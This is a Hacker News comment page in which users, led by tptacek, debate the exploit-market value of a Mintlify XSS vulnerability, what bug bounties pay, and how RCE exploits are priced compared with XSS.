Hacker Newsnew | past | comments | ask | show | jobs | submit | tptacek's commentslogin

Ehhhhhh careful, Mismeasure hasn't held up well, and there are better arguments.

This is identical to a comment you wrote on the other story about these vulnerabilities that's higher up on the front page, which isn't great.

I directionally agree with you but we could go another 20 comments deep on exactly what the purpose of an external pentest or red-team exercise is and how it might not match up perfectly with what an amateur web hacker is currently doing. But like: yeah, they could get into that business, at least until AI eats it.

Just going to say here that people routinely engage pentest firms, several times annually, for roughly that sum of money, hoping but not expecting game-over vulnerabilities (and, from bitter experience as a buyer rather than a seller of those services over the last 5 years --- "no game-over vulnerabilities" is a very common outcome!)

No it would not have been.

This specific XSS vulnerability may not have been, but the linked RCE vulnerability found by their friend https://kibty.town/blog/mintlify/ certainly would've been worth more than the $5,000 they were awarded.

A vulnerability like that (or even a slightly worse XSS that allowed serving js instead of only svg) could've let them register service workers to all visiting users giving future XSS ability at any time, even after the original RCE and XSS were patched.


Maybe? I don't know enough about the vulnerability. Is it serverside? Then it isn't worth very much.

Could you elaborate on why not?

What 'arcwhite said (sorry, I got dragged into a call).

1. The exploits (not vulnerabilities; that's mostly not a thing) that command grey/black market value all have half-lives.

2. Those exploits all fit into existing business processes; if you're imagining a new business, one that isn't actively running right now as we speak (such as you'd have to do to fit any XSS in a specific service), you're not selling an exploit; you're planning a heist.

3. The high-dollar grey market services traffic exclusively in RCE (specifically: reliable RCE exploits, overwhelmingly in mainstream clientside platforms, with sharp dropoffs in valuation as you go from e.g. Chrome to the next most popular browser).

4. Most of the money made in high-ticket exploit sales apparently (according to people who actually do this work) comes on the backend, from tranched maintenance fees.


There's generally no grey market for XSS vulns. The people buying operationalized exploits generally want things that they can aim very specifically to achieve an outcome against a particular target, without that target knowing about it, and operationalized XSS vulns seldom have that nature.

Your other potential buyers are malware distributors and scammers, who usually want a vuln that has some staying power (e.g. years of exploitability). This one is pretty clearly time-limited once it becomes apparent.


It would have been. Ten times the amount at least.

For a reflected XSS? Tell me who is paying that much for such a relatively common bug...

To elaborate, to exploit this you have to convince your target to open a specially crafted link which would look very suspect. The most realistic way to exploit would be to send a shortened link and hope they click on it, that they are logged into discord.com when they do (most people use the app), that there are no other security measures (httponly cookies) etc

No real way to use this to compromise a large amount of users without more complex means


It isn't about the commonality of the bug, but the level of access it gets you on the type or massive scale of the target. This bug you your blog? Who cares. This bug on Discord or AWS? Much more attractive and lucrative.

Yes, but this is not a particularly high access level bug.

Depending on the target, it's possible that the most damage you could do with this bug is a phishing attack where the user is presented a fake sign-in form (on a sketchy url)

I think $4k is a fair amount, I've done hackerone bounties too and we got less than that years ago for a twitter reflected xss


Why would that be the maximum damage ? This XSS is particularly dangerous because you are running your script on the same domain where the user is logged-in so you can pretty much do anything you want under his session.

In addition this is widespread. It's golden for any attacker.


Because modern cookie directives and browser configs neuter a lot of the worst XSS outcomes/easiest exploit paths. I would expect all the big sites to be setting them, though I guess you never know.

I would not be that confident as you can see: on their first example, they show Discord and the XSS code is directly executed on Discord.com under the logged-in account (some people actually use web version of Discord to chat, or sign-in on the website for whatever reason).

If you have a high-value target, it is a great opportunity to use such exploits, even for single shots (it would likely not be detected anyway since it's a drop in the ocean of requests).

Spreading it on the whole internet is not a good strategy, but for 4000 USD, being able to target few users is a great value.

Besides XSS, phishing has its own opportunity.

Example: Coinbase is affected too though on the docs subdomain and there are 2-step, so you cannot do transactions directly but if you just replace the content with a "Sign-in to Coinbase / Follow this documentation procedure / Download update", this can get very very profitable.

Someone would pay 4000 USD to receive 500'000 USD back in stolen bitcoins).

Still, purely with executing things under the user sessions there are interesting things to do.


Again, here you have not so much sold a vulnerability as you have planned a heist. I agree, preemptively: you can get a lot of money from a well-executed heist!

Do you want to execute actions as logged-in user on high-value website XXX ?

If yes -> very useful


Nobody is disputing that a wide variety of vulnerabilities are "useful", only that there's no market for most of them. I'd still urgently fix an XSS.

There is a market outside Zerodium, it's Telegram. Finding a buyer takes time and trust, but it has definitively higher value than 4k USD because of its real-world impact, no matter if it is technically lower on the CVSS scores.

Really? Tell me a story about someone selling an XSS vulnerability on Telegram.

("The CVSS chart"?)

Moments later

Why do people keep bringing up "Zerodium" as if it's a thing?


I understand your perspective about the technical value of an exploit, but I disagree with the concept that technical value = market value.

There are unorganized buyers who may be interested if they see potential to weaponize it.

In reality, if you want to maximize revenue, yes, you need to organize your own heist (if that's what you meant)


How would you make money from this? Most likely via phishing. Not exactly a zero-click RCE.

What happens in all these discussions is that we stealthily transition from "selling a vulnerability" to "planning a heist", and you can tell yourself any kind of story about planning a heist.

I don't like tptacek, but it's insane to not back up this comment with any amount of evidence or at least explanation. The guy knows his shit.

Hey I was wrong about Apple downthread.

What "grey market" are you talking about? How specific can you be about it?

I know you love asking people this question, so sorry to spoil your fun, but you know just as well as I do that there isn't really a "grey market".

There absolutely is. I'm just not familiar with one that buys these vulnerabilities.

Can you cite a source for that claim? The USG paying mid-5-figures for an XSS vulnerability? That's news to me.

The book "This Is How They Tell Me the World Ends" by Nicole Perlroth, while it's about the history of cyberweapons it does a very good job detailing the late 90s to early 2010s exploit market.

I don't have it in front of me, but I'm talking about the "nobody but us" era of exploit markets:

https://en.wikipedia.org/wiki/NOBUS

Where the NSA seemingly was buying anything, even if not worthwhile, as a form of "munitions collection" to be used for the future attacks.

edit: this mostly ended in the US because other nations started paying more, add in more regulations (only a handful companies are allowed to sell these exploits internationally) and software companies starting to do basic security practices (along with ruling out their own bug bounties), it just mostly whimpered away.

Also relevant to the discussion, the book discusses how the public exploit markets are exploitive to the workers themselves (low payouts when state actors would pay more) and there are periods of times where there would be open revolts too (see 2009 "No More Free Bugs" movement, also discussed in the book).

Definitely worth it if you aren't aware of this history, I wasn't.


I haven't read her book, am myself somewhat read in to the background here, and if she's claiming NSA was stockpiling serverside web bugs, I do not believe her.

In reality, intelligence agencies today don't even really stockpile mobile platform RCE. The economics and logistics are counterintuitive. Most of the money is made on the "backend", in support/update costs, paid in tranches; CNE vendors have to work hard to keep up with the platforms even when their bugs aren't getting burned. We interviewed Mark Dowd about this last year for the SCW podcast.


Maybe there is a misunderstanding, I'm not saying that the NSA would be buying XSS scripts. I'm saying that if this was 35 years ago the NSA would be buying exploits with common user software. Back then the exploits were "lesser" but there still was a market and not every exploit that was bought was a wonder of software engineering. Nowadays the targeted market is the web and getting exploits on some of the most used sites would be worthy of buying.

Kid was simply born in the wrong era to cash out easy money.


I think you're wrong about this. 35 years ago was 1990. Nobody was selling vulnerabilities in 1990 at all. By 1995, I was belting out memory corruption RCEs (it was a lot easier then), and there was no market for them at all. And there has never been a market for web vulnerabilities like XSS.

Building reliable exploits is very difficult today, but the sums a reliable exploit on a mainstream mobile platform garner are also very high. Arguably, today is the best time to be doing that kind of work, if you have the talent.


I can't imagine intelligence agencies/DoD not doing this with their gargantuan black budgets, if it's relevant to a specific target. They already contract with private research centers to develop exploits, and it's not like they're gonna run short on cash

If that were the case, we'd routinely see mysterious XSS exploits on social networks. The underlying bugs are almost always difficult to target! And yet we do not.

The biggest problem, again, is that the vulnerabilities disappear instantaneously when the vendors learn about them; in fact, they disappear in epsilon time once the vulnerabilities are used, which is not how e.g. a mobile browser drive-by works.


Why would YOU see a mystery XSS exploit on a social network? The idea of the DoD scoring these little exploits in a box is usually to deploy in a highly controlled and specific manner. You as a layperson is of no interest to them unless you are some kind of intelligence asset or foreign adversary

Wouldn't platforms see the supposed XSS payloads in their logs and publish analyses of them, or at the very least, announce that they happened?

Seems like none of these major websites detected anything, and they are supposed to be top-notch in the world.

It's only because the researcher contacted them.


Also because nobody actively exploited them! You're using the word "detected" to mean "discovered", which nobody working in the field would ever do.

detected: WAF caught or detected the attack and raised an alert, post-exploitation

discovered: they audited or pentested themself and found out, preemptively

I just mean that Coinbase didn’t see anything happening and didn’t take action though the boy successfully exploited the vulnerability on their live system.


This comes up on every story about bug bounties. There is in general no market at all for XSS vulnerabilities. That might be different for Twitter, Facebook, Instagram, and TikTok, because of the possibility of monetizing a single strike across a whole huge social network, and there's maybe a bank-shot argument for Discord, but you really have to do a lot of work to generate the monetization story for any of those.

The vulnerabilities that command real dollars all have half-lives, and can't be fixed with a single cluster of prod deploys by the victims.


If a $500 drone is coming for your $100M factory, the price limit for defense considerations isn't $500.

In the end, you are trying to encourage people not to fuck with your shit, instead of playing economic games. Especially with a bunch of teenagers who wouldn't even be fully criminally liable for doing something funny. $4K isn't much today, even for a teenager. Thanks to stupid AI shit like Mintlify, that's like worth 2GB of RAM or something.

It's not just compensation, it's a gesture. And really bad PR.


That's not how any of this works. A price for a vulnerability tracking the worst-case outcome of that vulnerability isn't a bounty or a market-clearing price; it's a shakedown fee. Meanwhile: the actual market-clearing price of an XSS vulnerability is very low (in most cases, it doesn't exist at all) because there aren't existing business processes those vulnerabilities drop seamlessly into; they're all situational and time-sensitive.

> the actual market-clearing price of an XSS vulnerability is very low (in most cases, it doesn't exist at all) because there aren't existing business processes those vulnerabilities drop seamlessly into; they're all situational and time-sensitive.

Could you elaborate on this? I don't fully understand the shorthand here.


I'm happy to answer questions but the only thing I could think to respond with here is just a restatement of what I said. I was terse; which part do you want me to expand on? Sorry about that!

> because there aren't existing business processes those vulnerabilities drop seamlessly into; they're all situational and time-sensitive.

what's an example of an existing business process that would make them valuable, just in theory? why do they not exist for xss vulns? why, and in what sense, are they only situational and time-sensitive?

i know you're an expert in this field. i'm not doubting the assertions just trying to understand them better. if i understand you're argument correctly, you're not doubting that the vuln found here could be damaging, only doubting that it could make money for an adversary willing to exploit it?


A remote code execution bug in ios is valuable - it may take a long time to detect exploitation (potentially years if used carefully), and even after being discovered there is a long tail of devices that take time to update (although less so than on android, or linux run on embedded devices that can’t be updated) That’s why it’s worth millions on the black market and apple will pay you $2 million dollars for it

An XSS is much harder to exploit quietly (the server can log everything), and can be closed immediately 100% with no long tail. At the push of an update the vulnerability is now worth zero. Someone paying to purchase an XSS is probably intending to use it once (with a large blast radius) and get as much as they can from it in the time until it is closed (hours? maybe days?)


I can't think of a business process that accepts and monetizes pin-compatible XSS vulnerabilities.

But for RCE, there's lots of them! RCE vulnerabilities slot into CNE implants, botnets, ransomware rigs, and organized identity theft.

The key thing here is that these businesses already exist. There are already people in the market for the vulnerabilities. If you just imagine a new business driven by XSS vulnerabilities, that doesn't create customers, any more than imagining a new kind of cloud service instantly gets you funded for one.


Thank you, makes a lot of sense.

I wonder what you think of this, re: the disparity between the economics you just laid out and the "companies are such fkn misers!" comments that always arise in these threads on bounty payouts...

I've seen first hand how companies devalue investment in security -- after all, it's an insurance policy whose main beneficiaries are their customers. Sure it's also reputational insurance in theory, but what is that compared with showing more profit this quarter, or using the money for growth if you're a startup, etc. Basically, the economic incentives are to foist the risks onto your customers and gamble that a huge incident won't sink you.

I wonder if that background calculus -- which is broadly accurate, imo -- is what rankles people about the low bounty rewards, especially from companies that could afford more?


The premise that "fucking companies are misers" operate on that I don't share is that vulnerabilities are finite and that, in the general case, there's an existential cost to not identifying and fixing them. From decades of vulnerability research work, including (over the past 5 years) as a buyer rather than a seller of that work: put 2 different teams on a project, get 2 different sets of vulnerabilities, with maybe 30-50% overlap. Keep doing that; you'll keep finding stuff.

Seen through that light, bug bounty programs are engineering services, not a security control. A thing generalist developers definitely don't get about high-end bug bounty programs is that they are more about focusing internal resources than they are about generating any particular set of bugs. They're a way of prioritizing triage and hardening work, driven by external incentives.

The idea that Discord is, like, eliminating their XSS risk by bidding for XSS vulnerabilities from bounty hunters; I mean, just, obviously no, right?


> That's not how any of this works.

Yes, evidently not.

Just because on average the intelligence agencies or ransom ware distributors wouldn't pay big bucks for XSS on Zerodium etc. doesn't mean that's setting the fair, or wise price for disclosure. Every bug bounty program is mostly PR mitigation. It's bad PR if you underpay for a disclosed vulnerability, which may have ended your business, considering the price of security audits/practices you cheaped out on. I mean, most bug bounty programs are actually paid by scope, not market price for technically comparable exploits. If you found an XSS vulnerability in an Apple service with this scope, I bet you would have been paid more than 4k.


Nobody is buying anything on "Zerodium".

I wasn't aware they are gone. It's not my game, replace with whatever shady exploit trader/market out there.

I do not in fact think you would make a lot more than $4000, or even $4000 in the first place, for an Apple XSS bug, unless it was extraordinarily situationally powerful (for instance, a first-stage for a clean, direct RCE). Bounty prices have nothing at all to do with the worst-case damage a motivated actor could cause with a vulnerability.

https://security.apple.com/bounty/categories/

The lowest tier is $5k. XSS up to $40k. I think we're talking exfiltration of dev credentials...


Nice, I hadn't seen that. Well, there you go: the absolute most you're going to make for the absolute worst-case XSS bug at the largest software firm in the world.

I don't think anybody in SFBA-style software development, both pre- and post-LLM, is really resilient against these kinds of attacks. The problem isn't vibe coding so much as it is multiparty DLL-hell dependency stacks, which is something I attribute more to Javascript culture than to any recent advance in technology.

I wonder what's worse, the SFBA-style software development, but also with SFBA-style 2 hour response window to serious bugs like Discord showed, or the old fashioned enterprise report your bug and within 2 months you'll receive an e-mail confirming your report if you're lucky and a letter from a lawyer if you're not.

You're right that it's a specific programming culture that is especially vulnerable to it. And for the same reasons they were vulnerable to the same thing to a lesser degree before the rise of LLMs.

But like, this case isn't really a dependency or supply chain attack. It's just allowing remote code execution because, idk, the dev who implemented it didn't read the manual and see that MDX can execute arbitrary code or something. Or maybe they vibe coded it and saw it worked and didn't bother to check. Perhaps it's a supply-chain attack on Discord et al to use Mintlify, if thats what you meant then I apologize.

I think you're right that I have an extreme aversion to SFBA-style software development, and partly because of how gen-ai is used there.


One might consider this a supply chain attack because the title of the post is “We pwned X, Vercel, Cursor, and Discord through a supply-chain attack”

I do occasionally wonder how different things would be if JavaScript had come with a very robust standard library from early on.

You're preaching to the choir about the fragility of the the "dig the dependency stack all the way down to hell" paradigm. But I don't think it applies in this particular case (neither does attributing it to vibe coding, IMHO).

The component which ultimately executed the payload in the SVG was the browser, and the backend dependency stack just served it verbatim as specified by the user. This is a 1990's style XSS fuckup, not anything subtle.


Please don't post insinuations about astroturfing, shilling, brigading, foreign agents, and the like. It degrades discussion and is usually mistaken. If you're worried about abuse, email hn@ycombinator.com and we'll look at the data.

https://news.ycombinator.com/newsguidelines.html


Sorry, didn't realize.

Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: